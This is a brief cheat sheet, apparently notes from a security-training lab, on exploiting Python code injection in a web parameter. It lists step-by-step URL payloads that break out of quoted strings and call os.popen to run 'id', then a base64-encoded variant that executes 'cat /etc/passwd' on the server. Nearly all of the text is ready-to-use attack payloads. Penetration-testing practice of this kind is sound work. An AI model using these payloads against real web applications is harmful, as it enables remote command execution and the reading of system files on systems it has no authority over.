str() in Python

Common Command Injection Step

# Check if you can insert the following characters for param=value
# ' 
# "
# and see if you get an error.
https://ptl-ac88f0b5-ecbb39a9.libcurl.so/hello/hacker'
https://ptl-ac88f0b5-ecbb39a9.libcurl.so/hello/hacker"

# Add another single quote or double quote to see if the error goes away.
hacker''
hacker""

# Then add a + (plus) between the two single quotes or double quotes.
hacker"+" 
hacker"+""+" 

# %2b = + 
# Add a character between the quotes - "+"a"+" - and check that you get no error.
hacker"%2b"a"%2b"

# Add the payload "+str(1)+" 
hacker"%2bstr(1)%2b"

# check the payload works - "+str(os.popen("id").read())+" 
hacker"%2bstr(os.popen("id").read())%2b"

# Check if the payload works - '+str(__import__('os').popen('id').read())+'
engine=Accuweather&query=1'%2bstr(__import__('os').popen('id').read())%2b'

Base64 based Command Injection Step

# Check if you can use / (slash) inside the command. Sometimes it does not work.
# In this case, you need to encode the string and decode it at runtime.

# Encode the command that you want to execute
echo 'cat /etc/passwd' | base64

# This is the result
Y2F0IC9ldGMvcGFzc3dkCg==

# Add the result to the following payload
__import__('base64').b64decode('Y2F0IC9ldGMvcGFzc3dkCg==')

# Let's use the following template
str(__import__('os').popen(<payload>).read())

# The payload with base64 decoding looks like below
str(__import__('os').popen(__import__('base64').b64decode('Y2F0IC9ldGMvcGFzc3dkCg==')).read())

# Final payload looks like below
hacker"%2bstr(__import__('os').popen(__import__('base64').b64decode('Y2F0IC9ldGMvcGFzc3dkCg==')).read())%2b"
